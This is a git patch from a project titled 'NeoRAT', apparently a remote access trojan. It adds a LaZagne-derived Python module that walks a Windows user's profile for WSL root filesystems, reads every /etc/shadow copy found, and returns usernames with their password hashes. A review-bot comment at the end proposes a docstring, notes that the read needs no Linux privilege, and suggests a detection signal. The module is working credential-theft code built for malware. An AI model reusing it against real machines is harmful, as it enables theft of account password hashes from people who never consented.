From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001 From: AL-LCL Date: Fri, 19 May 2023 11:01:49 +0200 Subject: NeoRAT
---
.../lazagne/softwares/sysadmin/wsl.py | 44 ++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 foreign/client_handling/lazagne/softwares/sysadmin/wsl.py (limited to 'foreign/client_handling/lazagne/softwares/sysadmin/wsl.py')
diff --git a/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py b/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py
new file mode 100644
index 0000000..b4e63e0
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/sysadmin/wsl.py
@@ -0,0 +1,44 @@
+# -*- coding: utf-8 -*-
+
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+import os
+
+
+class Wsl(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'wsl', 'sysadmin')
+
+ def run(self):
+ pwd_found = []
+ shadow_files_list = []
+
+ # Old WSL PATH
+ old_path = os.path.join(constant.profile['LOCALAPPDATA'], u'lxss\\rootfs\\etc\\shadow')
+
+ if os.path.exists(old_path):
+ shadow_files_list.append(old_path)
+
+ # New WSL PATH need to look into Package folder
+ new_path = os.path.join(constant.profile['LOCALAPPDATA'], u'Packages\\')
+ if os.path.exists(new_path):
+ for root, dirs, files in os.walk(new_path):
+ for file in files:
+ if file == "shadow":
+ shadow_files_list.append(os.path.join(root, file))
+
+ # Extract the hashes
+ for shadow in shadow_files_list:
+ with open(shadow, 'r') as shadow_file:
+ for line in shadow_file.readlines():
+ user_hash = line.replace('\n', '')
+ line = user_hash.split(':')
+
+ # Check if a password is defined
+ if not line[1] in ['x', '*', '!']:
+ pwd_found.append({
+ 'Hash': ':'.join(user_hash.split(':')[1:]),
+ 'Login': user_hash.split(':')[0].replace('\n', '')
+ })
+ return pwd_found
-- cgit v1.2.3
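Review bot: `Wsl.run` has no docstring or header comment saying that its return value is credential material. `pwd_found` is a list of `{'Hash', 'Login'}` dicts built from the legacy `lxss\rootfs\etc\shadow` file and from every file named `shadow` found by walking `%LOCALAPPDATA%\Packages\`. I would add a docstring such as `"""Return login/hash pairs read from WSL /etc/shadow copies stored in the Windows user profile."""` so an analyst can classify the module without reading the body. The read needs no privilege inside the distribution because these root filesystems are ordinary files owned by the Windows account, so the Linux-side permissions on /etc/shadow presumably do not apply. For detection, a read of a `rootfs\etc\shadow` path or a recursive walk of `Packages\` by a process that is not part of WSL is a useful signal, and entries whose second field is `x`, `*` or `!` are the only ones this code skips.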